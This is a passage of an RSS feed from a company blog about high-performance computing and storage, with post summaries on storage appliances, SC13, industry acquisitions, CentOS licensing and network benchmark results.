      <description>We&amp;rsquo;ve had customers migrating off of it for the past few years, as bugs have gone un-addressed, reports closed, and discussions cut off or ignored. It&amp;rsquo;s costing us too much in support time and effort now. It&amp;rsquo;s time to pull the plug. I like many things about gluster. Really I do. I&amp;rsquo;ve been a strong proponent of it long before it was cool to do so, as the design was in line with what I thought was needed to build scale out file systems.</description>
    </item>
    
    <item>
      <title>We had a record setting, knock the barn doors down year last year</title>
      <link>https://blog.scalability.org/2014/01/we-had-a-record-setting-knock-the-barn-doors-down-year-last-year/</link>
      <pubDate>Sat, 25 Jan 2014 15:32:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/01/we-had-a-record-setting-knock-the-barn-doors-down-year-last-year/</guid>
      <description>&amp;hellip; and believe it or not, I forgot to mention it. This is the first time in company history that we had a backlog going into Q1. Orders being built and tested on the last work day of the year. We grew, not the amount we had originally forecast, but we understand why (and sadly have little control over that aspect). We are working very hard on our appliances &amp;hellip; I am blown away as to how perfect a fit they are for folks.</description>
    </item>
    
    <item>
      <title>Something has been bugging me about the CentOS absorption by Red Hat</title>
      <link>https://blog.scalability.org/2014/01/something-has-been-bugging-me-about-the-centos-absorption-by-red-hat/</link>
      <pubDate>Sat, 25 Jan 2014 06:35:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/01/something-has-been-bugging-me-about-the-centos-absorption-by-red-hat/</guid>
      <description>I am obviously not a lawyer, and I&amp;rsquo;ve not consulted one. Feel free to point out my mistakes, and note that this is not legal advice. You need to speak to a lawyer on that, I am just guessing. The language on here is pretty clear as to what Red Hat owns. I have no problem with their ownership of it. Nor do I have a problem with them imposing their particular concept of ownership.</description>
    </item>
    
    <item>
      <title>Yay, latest Java update broke Supermicro remote console</title>
      <link>https://blog.scalability.org/2014/01/yay-latest-java-update-broke-supermicro-remote-console/</link>
      <pubDate>Fri, 24 Jan 2014 16:41:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/01/yay-latest-java-update-broke-supermicro-remote-console/</guid>
      <description>JRE 7 u 51. Self-signed Java console applet. Let the hilarity begin. I tried uploading our own cert and key to the unit. No luck. It&amp;rsquo;s the applet that needs to be re-signed. This is the joyous message that awaits:
Of course, the IPMIview tool sorta kinda works. Though it&amp;rsquo;s useless for remote support ops. Doesn&amp;rsquo;t set off the signing issue. Mebbe they ignore signing? Which is worse &amp;hellip; the self-signed cert, or the signature-ignoring app?</description>
    </item>
    
    <item>
      <title>An analytical takedown, gone awry</title>
      <link>https://blog.scalability.org/2014/01/an-analytical-takedown-gone-awry/</link>
      <pubDate>Thu, 23 Jan 2014 22:57:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/01/an-analytical-takedown-gone-awry/</guid>
      <description>See here, which is the response to the arXiv article here. While the Facebook data scientists refer to their post as a debunking, using an irrelevant metric (enrollment vs Google rank? and the theory behind this is &amp;hellip; what?), the paper points out something quite important. Social networking success has been largely ephemeral, and not sustainable. It&amp;rsquo;s a transient phenomenon. Anyone remember Friendster? MySpace? More to the point, the internet entities that dominated 15 years ago are largely gone.</description>
    </item>
    
    <item>
      <title>When bugs attack ... the case of the ever expanding VirtualBox image</title>
      <link>https://blog.scalability.org/2014/01/when-bugs-attack-the-case-of-the-ever-expanding-virtualbox-image/</link>
      <pubDate>Wed, 08 Jan 2014 15:47:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/01/when-bugs-attack-the-case-of-the-ever-expanding-virtualbox-image/</guid>
      <description>So I&amp;rsquo;ve got a Mac Mini and a Linux machine on my desk at work. I am trying hard to use the Mac Mini for day to day stuff, but the sheer broken-ness of the keyboard (yes, really) for Macs is driving me near batty. I am trying though. (Hint to Apple: You aren&amp;rsquo;t better at everything, and most especially not keyboards; at interfacing to higher-quality Logitech keyboards, you almost completely fail &amp;hellip; don&amp;rsquo;t even get me started on mice &amp;hellip;).</description>
    </item>
    
    <item>
      <title>CentOS™ merges with Red Hat</title>
      <link>https://blog.scalability.org/2014/01/centos-merges-with-red-hat/</link>
      <pubDate>Tue, 07 Jan 2014 22:45:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/01/centos-merges-with-red-hat/</guid>
      <description>See this page for more. Inclusive of this merging is a new set of requirements for using the word CentOS. Since we ship an updated and modified kernel, and we update and modify packages to reflect our needs, we are going to have to alter our &amp;ldquo;CentOS derived distribution&amp;rdquo; statement. Or switch to another distribution. It&amp;rsquo;s an annoyance, but maybe it&amp;rsquo;s time to revisit the distribution scenario. I see nothing wrong with using Debian as the basis, and building from there.</description>
    </item>
    
    <item>
      <title>Blocking hacker probes</title>
      <link>https://blog.scalability.org/2014/01/blocking-hacker-probes/</link>
      <pubDate>Sun, 05 Jan 2014 17:53:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/01/blocking-hacker-probes/</guid>
      <description>I honestly no longer even write a nice note to their ISP. I just tend to block the whole ISP from reaching our site(s). It&amp;rsquo;s easier, and less painful for us. Definitely saddens me that we have to do this, but I see enough probes in our logs that I have to.</description>
    </item>
    
    <item>
      <title>Fixed the IPoIB performance issue</title>
      <link>https://blog.scalability.org/2013/12/fixed-the-ipoib-performance-issue/</link>
      <pubDate>Fri, 27 Dec 2013 16:48:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/12/fixed-the-ipoib-performance-issue/</guid>
      <description>For our Unison Parallel File Systems Appliance:
[root@unison-jr4-2 ~]# iperf -c 10.3.1.1 ------------------------------------------------------------ Client connecting to 10.3.1.1, TCP port 5001 TCP window size: 1.00 MByte (default) ------------------------------------------------------------ [ 3] local 10.3.1.2 port 48383 connected with 10.3.1.1 port 5001 [ ID] Interval Transfer Bandwidth [ 3] 0.0-10.0 sec 13.5 GBytes 11.6 Gbits/sec  and of course in parallel
[root@unison-jr4-2 ~]# iperf -c 10.3.1.1 -P2 ------------------------------------------------------------ Client connecting to 10.3.1.1, TCP port 5001 TCP window size: 1.</description>
    </item>
    
    <item>
      <title>A network we can work with ...</title>
      <link>https://blog.scalability.org/2013/12/a-network-we-can-work-with/</link>
      <pubDate>Fri, 27 Dec 2013 02:56:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/12/a-network-we-can-work-with/</guid>
      <description>A Unison file system appliance connected with Infiniband and 10GbE.
[root@unison-jr4-2 ~]# qperf 10.3.1.1 rc_bi_bw rc_bi_bw: bw = 9.7 GB/sec [root@unison-jr4-2 ~]# qperf 10.3.1.1 ud_lat ud_bw ud_lat: latency = 3.66 us ud_bw: send_bw = 4.9 GB/sec recv_bw = 4.9 GB/sec  and of course, IPoIB
[root@unison-jr4-2 ~]# qperf 10.3.1.1 tcp_bw tcp_lat tcp_bw: bw = 474 MB/sec tcp_lat: latency = 13.4 us  which, if you run the same thing over a pair of good 10GbE ports &amp;hellip;</description>
    </item>
    
    <item>
      <title>M&amp;A continues ... Xyratex bought by Seagate</title>
      <link>https://blog.scalability.org/2013/12/ma-continues-xyratex-bought-by-seagate/</link>
      <pubDate>Tue, 24 Dec 2013 05:13:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/12/ma-continues-xyratex-bought-by-seagate/</guid>
      <description>The story is in the Register. An immediate question, and one of somewhat deja vu (all over again) &amp;hellip; what is the impact upon Lustre IP? Xyratex had announced that it obtained ownership of the Lustre IP from Oracle a few months ago. This IP was in the form of trademarks, and a number of related bits. Now Xyratex has been bought. And if it keeps the Lustre HPC bits, it will be directly competing with its customers.</description>
    </item>
    
    <item>
      <title>The evolving market for HPC: part 1, recent past</title>
      <link>https://blog.scalability.org/2013/12/the-evolving-market-for-hpc-part-1-recent-past/</link>
      <pubDate>Sat, 21 Dec 2013 17:20:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/12/the-evolving-market-for-hpc-part-1-recent-past/</guid>
      <description>I&amp;rsquo;ve said this many times, and at many different venues. HPC drives downmarket, and does so very hard. High cost solutions have limited lifetimes, at best. At worst, they will not catch on. 2013 was the year of the accelerators. We predicted this many years ago. I won&amp;rsquo;t beat this dead horse (for us). I&amp;rsquo;ll simply say &amp;ldquo;we were right&amp;rdquo;, and right with great specificity and accuracy. This seems to be a pattern with us.</description>
    </item>
    
    <item>
      <title>Calxeda restructures</title>
      <link>https://blog.scalability.org/2013/12/calxeda-restructures/</link>
      <pubDate>Thu, 19 Dec 2013 21:59:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/12/calxeda-restructures/</guid>
      <description>The day job had been talking to and working with Calxeda for a while. They&amp;rsquo;ve been undergoing some changes over the last few months as they worked to transition from an evangelist to a systems builder. The day job just got a note that they are restructuring. What this specifically means to an outsider, I am not sure, though I could speculate. HP has a vested interest in them. I wouldn&amp;rsquo;t be surprised to see a rapid asset acquisition.</description>
    </item>
    
    <item>
      <title>Prognostications for 2014 from an expert</title>
      <link>https://blog.scalability.org/2013/12/prognostications-for-2014-from-an-expert/</link>
      <pubDate>Tue, 17 Dec 2013 18:09:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/12/prognostications-for-2014-from-an-expert/</guid>
      <description>Not me. Henry Newman at Enterprise Storage Forum. See the article here. His first prediction of more consolidation in the SSD space is a given. I&amp;rsquo;ve been arguing that for a while. On the fab side, there are what &amp;hellip; four producers left? Toshiba/Sandisk, Samsung, Intel/Micron, Hynix? Did I miss anyone? Will any of them leave (voluntarily or otherwise)? I think the SSD space that will really consolidate is on the SSD-as-a-rack-appliance side, as well as on the card side.</description>
    </item>
    
    <item>
      <title>Violin kicks out founding CEO</title>
      <link>https://blog.scalability.org/2013/12/violin-kicks-out-founding-ceo/</link>
      <pubDate>Tue, 17 Dec 2013 17:07:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/12/violin-kicks-out-founding-ceo/</guid>
      <description>Story at The Register. Usually you give a CEO some time to right a listing ship. I pointed out in a recent post that there are some significant grumblings about Violin and in fact about most of the flash-as-rack-appliance space. I had noted
We&amp;rsquo;ve run into them a few times in competitive situations, so take what I write about them with an appropriate mass of NaCl. All the pure-play flash array vendors have to answer a basic question about their existence.</description>
    </item>
    
    <item>
      <title>M&amp;A:  Avago grabs ... LSI ... ?</title>
      <link>https://blog.scalability.org/2013/12/ma-avago-grabs-lsi/</link>
      <pubDate>Tue, 17 Dec 2013 16:24:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/12/ma-avago-grabs-lsi/</guid>
      <description>Avago, a spinout from Agilent which was a spinout from HP, just bought LSI. Avago is largely a supplier of components to a variety of industries, dealing with modules, optoelectronics, etc. If you look at their product mix, you see effectively zero overlap with LSI. They are not even in, arguably, the same markets. I am scratching my head over this one. I could see it as a play to gain a foothold into the storage space.</description>
    </item>
    
    <item>
      <title>First new Unison product sold</title>
      <link>https://blog.scalability.org/2013/12/first-new-unison-product-sold/</link>
      <pubDate>Thu, 12 Dec 2013 20:59:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/12/first-new-unison-product-sold/</guid>
      <description>We were showing off the Unison units at #SC13, and while on the show floor, we managed to sell a storage cluster. Well, technically, the sale occurred after the show (last week in reality), but most of the configuration back and forth was during the show. I can&amp;rsquo;t say anything about the configuration or stack on it &amp;hellip; yet &amp;hellip; but you&amp;rsquo;ll be hearing about it fairly soon. It&amp;rsquo;s one we talk about quite a bit.</description>
    </item>
    
    <item>
      <title>Violin&#39;s (and other pure flash array vendors) post IPO struggles continue</title>
      <link>https://blog.scalability.org/2013/12/violins-and-other-pure-flash-array-vendors-post-ipo-struggles-continue/</link>
      <pubDate>Thu, 12 Dec 2013 18:47:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/12/violins-and-other-pure-flash-array-vendors-post-ipo-struggles-continue/</guid>
      <description>There&amp;rsquo;s a story on The Register right now about Violin Memory losing its CTO. But that&amp;rsquo;s not the real interesting story. In the article, Chris Mellor does a pretty good job of laying bare the issues around Violin.
There are several different threads running through this. First, they don&amp;rsquo;t have much real software IP. Their hardware IP is a different story, but fundamentally, we&amp;rsquo;ve found that it&amp;rsquo;s best to have a very simple and effective hardware design, coupled with intelligent software.</description>
    </item>
    
    <item>
      <title>You can tell you are a little nuts if ...</title>
      <link>https://blog.scalability.org/2013/12/you-can-tell-you-are-a-little-nuts-if/</link>
      <pubDate>Wed, 11 Dec 2013 23:25:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/12/you-can-tell-you-are-a-little-nuts-if/</guid>
      <description>&amp;hellip; you get really annoyed at the performance of grep on file IO (seriously folks? 32k or page-sized IO? What is this &amp;hellip; 1992?) so you rewrite it in 20 minutes in Perl, and increase the performance by 5-8x or so. If I get angry enough, I might just go all out, use direct IO, multiple parallel readers, and some other bits. I&amp;rsquo;ve got these huge disk pipes, awesome bandwidths, and this tiny little filter tool.</description>
    </item>
    
    <item>
      <title>The most popular data analytics language</title>
      <link>https://blog.scalability.org/2013/12/the-most-popular-data-analytics-language/</link>
      <pubDate>Sat, 07 Dec 2013 18:05:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/12/the-most-popular-data-analytics-language/</guid>
      <description>&amp;hellip; appears to be R
[ ](http://revolution-computing.typepad.com/.a/6a010534b1db25970b019b00077267970b-popup)
This is in line with what I&amp;rsquo;ve heard, though I thought SAS was comparable in primary or secondary tool usage. This said, it&amp;rsquo;s important to note that in this survey, we don&amp;rsquo;t see mention of Python. Working against this is that it is a small (1300-ish) self-selecting sample, and the reporting company has a stake in the results. Also of importance is that R is a package with an embedded programming language, and Python is a programming language with add-ons.</description>
    </item>
    
    <item>
      <title>And the SC13 video from InsideHPC is up</title>
      <link>https://blog.scalability.org/2013/12/and-the-sc13-video-from-insidehpc-is-up/</link>
      <pubDate>Fri, 06 Dec 2013 14:12:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/12/and-the-sc13-video-from-insidehpc-is-up/</guid>
      <description>As usual, Rich and the team at InsideHPC have done a tremendous job. If you don&amp;rsquo;t know InsideHPC and its sibling, InsideBigData, I highly recommend both publications. They are on my go-to list as information sources/summaries. The video shows a well-caffeinated Joe, talking through our new products. The problem for us was there simply wasn&amp;rsquo;t sufficient time to go into detail on everything. Which is a shame IMO, but one we&amp;rsquo;ll look at rectifying later.</description>
    </item>
    
    <item>
      <title>The 60 second guide to big data by gogrid</title>
      <link>https://blog.scalability.org/2013/12/the-60-second-guide-to-big-data-by-gogrid/</link>
      <pubDate>Tue, 03 Dec 2013 14:49:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/12/the-60-second-guide-to-big-data-by-gogrid/</guid>
      <description>The GoGrid folks have put together a nice marketing slide on big data, in the sense that they are explaining the features of it without explaining it, or how/where they fit. It&amp;rsquo;s implied that they provide all you need for Big Data, but it&amp;rsquo;s their points along the way that make a great point for the day job and especially our new Fast Path Big Data Appliances. Our argument has always been that you can&amp;rsquo;t approach Big Data with last millennium&amp;rsquo;s architecture.</description>
    </item>
    
    <item>
      <title>Big data languages: the reason for the tests</title>
      <link>https://blog.scalability.org/2013/11/big-data-languages-the-reason-for-the-tests/</link>
      <pubDate>Sat, 30 Nov 2013 21:14:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/11/big-data-languages-the-reason-for-the-tests/</guid>
      <description>In a number of recent articles, I&amp;rsquo;ve seen/read that &amp;ldquo;Python is displacing R&amp;rdquo;, and other similar things. Something about this intrigued me, as I had heard many years ago that &amp;ldquo;Python was displacing Perl&amp;rdquo;. Only, it wasn&amp;rsquo;t. And others are questioning the supplantation premise quite strongly. It seems that there is little actual evidence of this. Mostly hyperbole, guesses, and dare I say, wishful thinking. It seems that this is modus operandi for Python advocates, and their latest object of attention is R.</description>
    </item>
    
    <item>
      <title>Riemann zeta function in parallel/vector data languages</title>
      <link>https://blog.scalability.org/2013/11/riemann-zeta-function-in-parallelvector-data-languages/</link>
      <pubDate>Sat, 30 Nov 2013 20:26:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/11/riemann-zeta-function-in-parallelvector-data-languages/</guid>
      <description>Continuing the work of the previous post, I looked into rewriting the serial code to run in parallel/vector data languages. My original supposition about what would make a good data language is now in doubt as a result. First, I used PDL in Perl. But it&amp;rsquo;s Perl, right? It can&amp;rsquo;t possibly be fast. That would be &amp;hellip; like, I dunno &amp;hellip; wrong? (yes, this is sarcasm). This completes the task in 12s.</description>
    </item>
    
    <item>
      <title>Quick tests with Riemann zeta function code in a few languages</title>
      <link>https://blog.scalability.org/2013/11/quick-tests-with-riemann-zeta-function-code-in-a-few-languages/</link>
      <pubDate>Sat, 30 Nov 2013 07:00:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/11/quick-tests-with-riemann-zeta-function-code-in-a-few-languages/</guid>
      <description></description>
    </item>
    
    <item>
      <title>Knights Landing</title>
      <link>https://blog.scalability.org/2013/11/knights-landing/</link>
      <pubDate>Fri, 29 Nov 2013 17:36:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/11/knights-landing/</guid>
      <description>Over at InsideHPC, Rich has a short take on Knights Landing with a link to the longer article. This is implicitly the direction I thought things would be going in &amp;hellip; drop-in replacement CPUs to provide acceleration. Probably some big-small designs to handle OS tasks on specific cores (and reduce OS-based jitter). This said, 2x such sockets gets you to 72 lanes of PCIe gen 3. A little light for us, but we&amp;rsquo;ll figure something out (our current units are more than this).</description>
    </item>
    
    <item>
      <title>... and OCZ goes down</title>
      <link>https://blog.scalability.org/2013/11/and-ocz-goes-down/</link>
      <pubDate>Wed, 27 Nov 2013 23:39:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/11/and-ocz-goes-down/</guid>
      <description>see here This is a Chapter 7 dissolution, not a Chapter 11 restructuring. Assets to be sold, likely to Toshiba.
I expect more of these from other vendors. The SSD space has needed consolidation for a while. STEC purchased by WD, and Smart by Sandisk, have removed most of the high end of the market from the startup side. Pliant was grabbed by Sandisk previously. Who else remains? On the low-midrange of the market, you have Intel, Micron, and a few others.</description>
    </item>
    
    <item>
      <title>I guess no one at the beobash saw the 10% discount link ...</title>
      <link>https://blog.scalability.org/2013/11/i-guess-no-one-at-the-beobash-saw-the-10-discount-link/</link>
      <pubDate>Wed, 27 Nov 2013 16:24:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/11/i-guess-no-one-at-the-beobash-saw-the-10-discount-link/</guid>
      <description>Basically, if you go to this site, provide your information, and use the code &amp;ldquo;beobash13&amp;rdquo;, you get a nice discount on your next purchase from Scalable Informatics until the end of 2013. The rules are simple: provide your contact information, let us know what products you want to talk about, then buy and pay for them by the end of the year. We are offering something like a 10% discount for this.</description>
    </item>
    
    <item>
      <title>Finally have a customer information page talking directly to zoho crm</title>
      <link>https://blog.scalability.org/2013/11/finally-have-a-customer-information-page-talking-directly-to-zoho-crm/</link>
      <pubDate>Mon, 25 Nov 2013 06:35:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/11/finally-have-a-customer-information-page-talking-directly-to-zoho-crm/</guid>
      <description>This took a bit, as the API is documented, but wasn&amp;rsquo;t quite working for some reason. But now we&amp;rsquo;ve linked our signup page to drop data directly into zoho. This was made harder by the XML based API not working as documented. I posted a forum note, after searching on the forum for answers. Others had the same questions. I built a simple testing code, and it didn&amp;rsquo;t work. Posted this to the forum.</description>
    </item>
    
    <item>
      <title>SC13: the Limulus boxen appear</title>
      <link>https://blog.scalability.org/2013/11/sc13-the-limulus-boxen-appear/</link>
      <pubDate>Sat, 23 Nov 2013 19:32:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/11/sc13-the-limulus-boxen-appear/</guid>
      <description>[Disclosure: we do have a business relationship with Basement Supercomputing] (this is a longer version of the beowulf item I posted) Years ago, I came to the conclusion that there was no personal supercomputing market after we tried with a deskside system &amp;hellip; what I called a &amp;ldquo;muscular desktop&amp;rdquo; with a great deal of IO, processing, ram, and graphics. We just could not find the right niche for this, and we were being badly undercut in price by the Dell-like companies of the world, selling low end boxes that were &amp;hellip; good enough &amp;hellip; for a small set of tasks.</description>
    </item>
    
    <item>
      <title>SC13 observations</title>
      <link>https://blog.scalability.org/2013/11/sc13-observations/</link>
      <pubDate>Sat, 23 Nov 2013 18:59:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/11/sc13-observations/</guid>
      <description>From a post to the beowulf list:
 I didn&amp;rsquo;t get a chance to see many booths &amp;hellip; I did get free the last hour of Thursday to wander, and made sure I got to see a few people and companies. What I observed (and please feel free to challenge/contradict/offer alternative interpretations/your own views) will definitely be colored by the glasses we wear, and the market we are in.
 not so many chip companies (new processor designs, etc.</description>
    </item>
    
    <item>
      <title>SC13 finale</title>
      <link>https://blog.scalability.org/2013/11/sc13-finale/</link>
      <pubDate>Sat, 23 Nov 2013 00:44:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/11/sc13-finale/</guid>
      <description>That was a wonderful show. People got to see what we were about, our new appliances, our performance. I see many possibilities. This is good. Some key takeaways:
 We have the fastest, densest systems in the market. Our usable performance far outpaces our nearest competitors&amp;rsquo; configurations, which are not reasonable configs (hello &amp;hellip; 60+ raw JBOD? or RAID0 &amp;hellip; seriously? And no one has challenged them on this?). Our partners rocked.</description>
    </item>
    
    <item>
      <title>SC13: Day 2 wrap up</title>
      <link>https://blog.scalability.org/2013/11/sc13-day-2-wrap-up/</link>
      <pubDate>Thu, 21 Nov 2013 06:07:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/11/sc13-day-2-wrap-up/</guid>
      <description>Day 1 was incredible. Day 2 topped day 1 by a fair amount. I realized yesterday that I had forgotten to put up our speedometer website, which pulled data directly from the siFlash hardware on the real IO performance. I had this unit running hard, and the IO operations were moving quite well. So I put up the web page on my laptop, and this is what we saw: 30GB/s.</description>
    </item>
    
    <item>
      <title>An apology</title>
      <link>https://blog.scalability.org/2013/11/an-apology/</link>
      <pubDate>Thu, 21 Nov 2013 04:23:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/11/an-apology/</guid>
      <description>When I mess up, I don&amp;rsquo;t normally do it in a small way. I jump in hard, head first. I made an assumption about something I did not have all the facts about today, and began to tear into someone who did not deserve this treatment, after making him wait for me at our booth. Yeah, this was a major screw up on my part. Addison, I hope you will forgive me, and accept my humble apology.</description>
    </item>
    
    <item>
      <title>SC13 day 1 wrap up</title>
      <link>https://blog.scalability.org/2013/11/sc13-day-1-wrap-up/</link>
      <pubDate>Wed, 20 Nov 2013 08:32:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/11/sc13-day-1-wrap-up/</guid>
      <description>A good day at the booth. The talks were well attended, and speakers and their topics were interesting. Our partners in the booth: Kx, Veristorm, Basement Supercomputing, Sandisk, XtremeData, and Inktank are phenomenal. We announced many new products, all on display at our booth, and the partners working with us on these products were there to talk about the applications. What we didn&amp;rsquo;t show off were the speedometers measuring the performance live on the systems.</description>
    </item>
    
    <item>
      <title>Interesting article</title>
      <link>https://blog.scalability.org/2013/11/interesting-article/</link>
      <pubDate>Sat, 16 Nov 2013 01:26:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/11/interesting-article/</guid>
      <description>I read this on Gigaom. In it, there is a claim of the densest storage on the market coming from Quanta, and a full rack of them would be about 3/4 ton (about 682 kg). Amazon uses a &amp;ldquo;special&amp;rdquo; design that comes in more than a ton according to the article. So I decided to look into what a simple 42U rack of say 10 of our bad boys would come out with weight wise.</description>
    </item>
    
    <item>
      <title>Legend ... wait for it ... dary!</title>
      <link>https://blog.scalability.org/2013/11/legend-wait-for-it-dary/</link>
      <pubDate>Fri, 15 Nov 2013 22:32:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/11/legend-wait-for-it-dary/</guid>
      <description>This bit on 0mq&amp;rsquo;s forum &amp;hellip; My favorite comment:</description>
    </item>
    
    <item>
      <title>Broken APIs and other time wasters</title>
      <link>https://blog.scalability.org/2013/11/broken-apis-and-other-time-wasters/</link>
      <pubDate>Fri, 15 Nov 2013 06:25:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/11/broken-apis-and-other-time-wasters/</guid>
      <description>So I spent the day trying to figure out why my simple form submission, which generated XML output and then posted to Zoho CRM, did not, in fact, work. I was doing this without the Zoho code, just a description of their API. It&amp;rsquo;s an older API, that much is obvious. You talk to it through XML. You post your XML. But you put parameters on the URI to control the post.</description>
    </item>
    
    <item>
      <title>Sneak peek at UI atop RESTful API</title>
      <link>https://blog.scalability.org/2013/11/sneak-peek-at-ui-atop-restful-api/</link>
      <pubDate>Wed, 13 Nov 2013 16:27:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/11/sneak-peek-at-ui-atop-restful-api/</guid>
      <description>This is our new, common UI across all machines, clusters, clouds, appliances, tiburon/Scalable OS &amp;hellip; This one in particular is running atop our siRouter. More on that soon, but have a little gander.
[ ](/images/SOS-v1.png)
The UI is basically a &amp;ldquo;thin&amp;rdquo; layer atop the RESTful interface. And it&amp;rsquo;s a proper RESTful interface, none of this conflated GET where we mean POST/PUT and all that. More at SC13. I promise.</description>
    </item>
    
    <item>
      <title>kvm incompatible with xfs</title>
      <link>https://blog.scalability.org/2013/11/kvm-incompatible-with-xfs/</link>
      <pubDate>Sun, 10 Nov 2013 03:17:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/11/kvm-incompatible-with-xfs/</guid>
      <description>Just found this out by way of an experiment for a partner. Cool partner, cool product, running on our fast hardware for SC13. Problem is that I was seeing some very odd error messages when I tried to mount a volume stored in a file on an xfs based LUN. I could dd to the file. I could mkfs.ext* the /dev/vda. But the moment I tried to mount it, block errors.</description>
    </item>
    
    <item>
      <title>BeoBash13: the revenge of the rampaging physics-turned-supercomputer geeks?</title>
      <link>https://blog.scalability.org/2013/11/beobash13-the-revenge-of-the-rampaging-physics-turned-supercomputer-geeks/</link>
      <pubDate>Thu, 07 Nov 2013 00:06:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/11/beobash13-the-revenge-of-the-rampaging-physics-turned-supercomputer-geeks/</guid>
      <description>Or something like that. See here We&amp;rsquo;ll be there!</description>
    </item>
    
    <item>
      <title>SC13 T-14 days</title>
      <link>https://blog.scalability.org/2013/11/sc13-t-14-days/</link>
      <pubDate>Tue, 05 Nov 2013 04:25:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/11/sc13-t-14-days/</guid>
      <description>We will be at booth 1919. Please do come by and say hello. We&amp;rsquo;ll have coffee/tea (I think), a number of machines, great partners with a number of demos, and hopefully some talks on big data analytics in Financial Services, Parallel high performance databases, massive key-value storage and processing, as well as a few other bits. We&amp;rsquo;ll have a very cool box from one of our friends in the booth. We ship the machines at the end of this week, or beginning of next.</description>
    </item>
    
    <item>
      <title>And then they fight you</title>
      <link>https://blog.scalability.org/2013/11/and-then-they-fight-you/</link>
      <pubDate>Tue, 05 Nov 2013 04:15:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/11/and-then-they-fight-you/</guid>
      <description>We&amp;rsquo;ve been championing the tightly coupled storage and computing model for a long time. When it was unfashionable, when it was discarded as &amp;ldquo;this is something you should not do&amp;rdquo; by others &amp;ldquo;who knew better&amp;rdquo;. Now, the ideas, the concepts, the thoughts, the designs and implementations behind it are all around. Joyent&amp;rsquo;s Manta system is an implementation of the concept. Arguably, the more advanced MapReduce and Hadoop designs are also implementations &amp;hellip; have the data right next to the processing, and provide gargantuan bandwidth locally to the data.</description>
    </item>
    
    <item>
      <title>Cray acquires the IP assets and people of Gnodal</title>
      <link>https://blog.scalability.org/2013/11/cray-acquires-the-ip-assets-and-people-of-gnodal/</link>
      <pubDate>Fri, 01 Nov 2013 16:34:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/11/cray-acquires-the-ip-assets-and-people-of-gnodal/</guid>
      <description>We used Gnodal units for the original Lucera system. Very nice devices with a few idiosyncrasies. Gnodal ran into some funding problems earlier this year, and had to find a buyer. Cray grabbed them and a number of the people involved. This is good for Gnodal and Cray. Gnodal has interesting technology. And Cray may be looking at how to leverage SDN for its system using this (wild guess on my part, I have no knowledge direct or indirect of their plans/intentions/&amp;hellip;).</description>
    </item>
    
    <item>
      <title>First distributed file system for STAC M3 benchmarks</title>
      <link>https://blog.scalability.org/2013/10/first-distributed-file-system-for-stac-m3-benchmarks/</link>
      <pubDate>Tue, 29 Oct 2013 01:35:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/10/first-distributed-file-system-for-stac-m3-benchmarks/</guid>
      <description>We ran the STAC M3 on a Ceph based storage cloud appliance you will be hearing more about soon. The report should be up on the STAC site later this week. Here are some of the take-aways:
We chose Ceph for several reasons, but you should expect to see others very soon as well. Our Cluster and Cloud storage appliances are based upon our very powerful and very dense building blocks.</description>
    </item>
    
    <item>
      <title>At the STAC Summit in NYC, presenting our Time Series Analytics Appliance</title>
      <link>https://blog.scalability.org/2013/10/at-the-stac-summit-in-nyc-presenting-our-time-series-analytics-appliance/</link>
      <pubDate>Tue, 29 Oct 2013 01:28:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/10/at-the-stac-summit-in-nyc-presenting-our-time-series-analytics-appliance/</guid>
      <description>This was a good meeting in general. Lively panelists, focused panels, though somewhat vendor heavy in a number of cases. I have a sense of a &amp;ldquo;Gandhi&amp;rdquo; experience in progress from the parallel file systems panel. 4 vendors, one user. The user was fantastic, and the vendors were pushing most of their own stuff. One vendor in particular took some not too thinly veiled shots directly at us without naming us.</description>
    </item>
    
    <item>
      <title>But, of course</title>
      <link>https://blog.scalability.org/2013/10/but-of-course/</link>
      <pubDate>Fri, 25 Oct 2013 04:20:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/10/but-of-course/</guid>
